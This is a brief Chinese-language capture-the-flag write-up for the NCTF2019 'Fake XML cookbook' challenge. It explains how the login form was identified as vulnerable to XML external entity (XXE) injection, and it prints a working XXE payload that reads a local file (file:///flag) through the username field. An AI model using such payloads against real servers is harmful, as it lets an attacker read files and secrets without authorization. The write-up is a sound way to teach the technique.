[NCTF2019]Fake XML cookbook1

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
不会编程的懒洋洋3 天前
WPF XAML+布局+控件
xml·开发语言·c#·视觉检测·wpf·机器视觉·视图
鸽芷咕4 天前
KingbaseES数据类型完全指南:从基础CHAR到JSON/XML/几何类型
xml·oracle·json
java1234_小锋8 天前
MyBatis中XML映射有哪些标签?
xml·tomcat·mybatis
大腕先生8 天前
通用分页超详细介绍(附带源代码解析&页面展示效果)
xml·java·linux·服务器·开发语言·前端·idea
许彰午11 天前
Spring Boot + Vue 实现 XML 动态表单:固定字段 + 自由扩展方案
xml·vue.js·spring boot
untE EADO12 天前
Tomcat的server.xml配置详解
xml·java·tomcat
zuowei288912 天前
spring实例化对象的几种方式(使用XML配置文件)
xml·java·spring
weixin_5206498712 天前
xml json ini 文件语法
xml·java·json
Full Stack Developme12 天前
Hutool XML 操作教程
xml·windows·python